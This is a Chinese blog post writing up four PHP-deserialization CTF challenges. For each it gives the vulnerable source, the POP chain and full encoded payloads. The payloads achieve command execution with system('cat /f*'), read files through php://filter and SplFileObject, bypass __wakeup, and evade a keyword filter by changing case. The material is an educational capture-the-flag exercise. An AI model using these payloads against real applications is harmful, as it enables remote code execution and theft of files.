当前位置：首页 > news >正文

【Web】PHP反序列化刷题记录

news 2025/11/20 18:36:23

①[NISACTF 2022]babyserialize

②[NISACTF 2022]popchains

③[SWPUCTF 2022 新生赛]ez_ez_unserialize

④[GDOUCTF 2023]反方向的钟

再巩固下基础

①[NISACTF 2022]babyserialize

<?php
include "waf.php";
class NISA{public $fun="show_me_flag";public $txw4ever;public function __wakeup(){if($this->fun=="show_me_flag"){hint();}}function __call($from,$val){$this->fun=$val[0];}public function __toString(){echo $this->fun;return " ";}public function __invoke(){checkcheck($this->txw4ever);@eval($this->txw4ever);}
}class TianXiWei{public $ext;public $x;public function __wakeup(){$this->ext->nisa($this->x);}
}class Ilovetxw{public $huang;public $su;public function __call($fun1,$arg){$this->huang->fun=$arg[0];}public function __toString(){$bb = $this->su;return $bb();}
}class four{public $a="TXW4EVER";private $fun='abc';public function __set($name, $value){$this->$name=$value;if ($this->fun = "sixsixsix"){strtolower($this->a);}}
}if(isset($_GET['ser'])){@unserialize($_GET['ser']);
}else{highlight_file(__FILE__);
}//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}//function hint(){
//    echo ".......";
//    die();
//}
?>

手搓链子：

TianXiWei::__wakeup -> llovetxw::__call -> four::__set -> lloverxw::__toString -> NISA::__invoke

构造

<?phpclass NISA{public $fun="show_me_flag";public $txw4ever;
}class TianXiWei{public $ext;public $x;
}class Ilovetxw{public $huang;public $su;
}class four{public $a="TXW4EVER";private $fun='sixsixsix';
}$a=new TianXiWei();
$b=new Ilovetxw();
$c=new four();
$d=new NISA();
$d->txw4ever="system('cat /f*');";
$c->a=$b;
$b->huang=$c;
$b->su=$d;
$a->ext=$b;echo urlencode(serialize($a));

因为存在private属性，所以要urlencode一下

payload:

?ser=O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A12%3A%22show_me_flag%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A18%3A%22System%28%27cat+%2Ff%2A%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D

回显

再删去="show_me_flag"即可绕过hint的die()

?ser=O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A18%3A%22system%28%27cat+%2Ff%2A%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D

回显waf，右键查看源代码也没有提示

估计是关键词过滤，一个一个试，最后将system改为System即可成功命令执行

②[NISACTF 2022]popchains

Happy New Year~ MAKE A WISH
<?phpecho 'Happy New Year~ MAKE A WISH<br>';if(isset($_GET['wish'])){@unserialize($_GET['wish']);
}
else{$a=new Road_is_Long;highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/class Road_is_Long{public $page;public $string;public function __construct($file='index.php'){$this->page = $file;}public function __toString(){return $this->string->page;}public function __wakeup(){if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {echo "You can Not Enter 2022";$this->page = "index.php";}}
}class Try_Work_Hard{protected  $var;public function append($value){include($value);}public function __invoke(){$this->append($this->var);}
}class Make_a_Change{public $effort;public function __construct(){$this->effort = array();}public function __get($key){$function = $this->effort;return $function();}
}
/**********************Try to See flag.php*****************************/

搓链子

Road_is_Long::__wakeup -> Road_is_Long::__toString -> Make_a_Change::__get -> Try_Work_Road::__invoke

构造

<?php
class Road_is_Long{public $page;public $string;}class Try_Work_Hard{protected  $var="php://filter/convert.base64-encode/resource=/flag";
}class Make_a_Change{public $effort;} $a=new Road_is_Long();
$b=new Make_a_Change();
$c=new Try_Work_Hard();
$a->page=$a;
$a->string=$b;
$b->effort=$c;
echo urlencode(serialize($a));

这里的__toString方法由preg_match触发

因为存在protected属性，所以要urlencode

payload:

?wish=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Br%3A1%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A49%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D

base64解码即可拿到flag(这里/flag是纯文本文档，没有php标签，所以也可以直接读取)

③[SWPUCTF 2022 新生赛]ez_ez_unserialize

<?php
class X
{public $x = __FILE__;function __construct($x){$this->x = $x;}function __wakeup(){if ($this->x !== __FILE__) {$this->x = __FILE__;}}function __destruct(){highlight_file($this->x);//flag is in fllllllag.php}
}
if (isset($_REQUEST['x'])) {@unserialize($_REQUEST['x']);
} else {highlight_file(__FILE__);
}

一眼绕过__wakeup

$a=new X('fllllllag.php');
echo serialize($a);

?x=O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

改为?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}即可

④[GDOUCTF 2023]反方向的钟

<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{public $name;public $rank;private $salary;public function __construct($name,$rank,$salary = 10000){$this->name = $name;$this->rank = $rank;$this->salary = $salary;}
}class classroom{public $name;public $leader;public function __construct($name,$leader){$this->name = $name;$this->leader = $leader;}public function hahaha(){if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){return False;}else{return True;}}
}class school{public $department;public $headmaster;public function __construct($department,$ceo){$this->department = $department;$this->headmaster = $ceo;}public function IPO(){if($this->headmaster == 'ong'){echo "Pretty Good ! Ctfer!\n";echo new $_POST['a']($_POST['b']);}}public function __wakeup(){if($this->department->hahaha()) {$this->IPO();}}
}if(isset($_GET['d'])){unserialize(base64_decode($_GET['d']));
}
?>

搓链子

school::__wakeup()–>classroom::hahaha()–>school::IPO()

构造

$a=new school();
$b=new classroom();
$c=new teacher();
$b->name="one class";
$b->leader=$c;
$c->name="ing";
$c->rank="department";
$a->department=$b;
$a->headmaster="ong";
echo base64_encode(serialize($a));

payload:

?d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

回显

说明构造成功

利用原生类SplFileObject读取文件

PHP原生类及其应用

post传参：

a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

base64解码后拿到flag

【Web】PHP反序列化刷题记录

①[NISACTF 2022]babyserialize

②[NISACTF 2022]popchains

③[SWPUCTF 2022 新生赛]ez_ez_unserialize

④[GDOUCTF 2023]反方向的钟

相关文章：

【Web】PHP反序列化刷题记录

C++标准模板库 STL 简介(standard template library)

Linux篇：文件系统

AI - Crowd Simulation(集群模拟)

＜JavaEE＞ Java中线程有多少种状态（State）？状态之间的关系有什么关系？

正则表达式通配符 awk文本处理工具

三、ts高级笔记，

二十一、数组（6）

flask依据现有的库表快速生成flask实体类

.NET6 开发一个检查某些状态持续多长时间的类

链表K个节点的组内逆序调整问题

安卓隐私指示器学习笔记

【Jenkins】jenkins发送邮件报错：Not sent to the following valid addresses:

CSS3制作3D爱心动画

Python Opencv实践 - 全景图片拼接stitcher

echarts 几千条分钟级别在小时级别图标上展示

操作系统的中断与异常（408常考点）

linux下的工具---vim

代码随想录算法训练营第六十天|84. 柱状图中最大的矩形

P14 C++局部静态变量static延长生命周期

全球首个30米分辨率湿地数据集(2000—2022)

质量体系的重要

【ROS】Nav2源码之nav2_behavior_tree-行为树节点列表

MODBUS TCP转CANopen 技术赋能高效协同作业

【2025年】解决Burpsuite抓不到https包的问题

python如何将word的doc另存为docx

Psychopy音频的使用

涂鸦T5AI手搓语音、emoji、otto机器人从入门到实战

使用 Streamlit 构建支持主流大模型与 Ollama 的轻量级统一平台

重启Eureka集群中的节点，对已经注册的服务有什么影响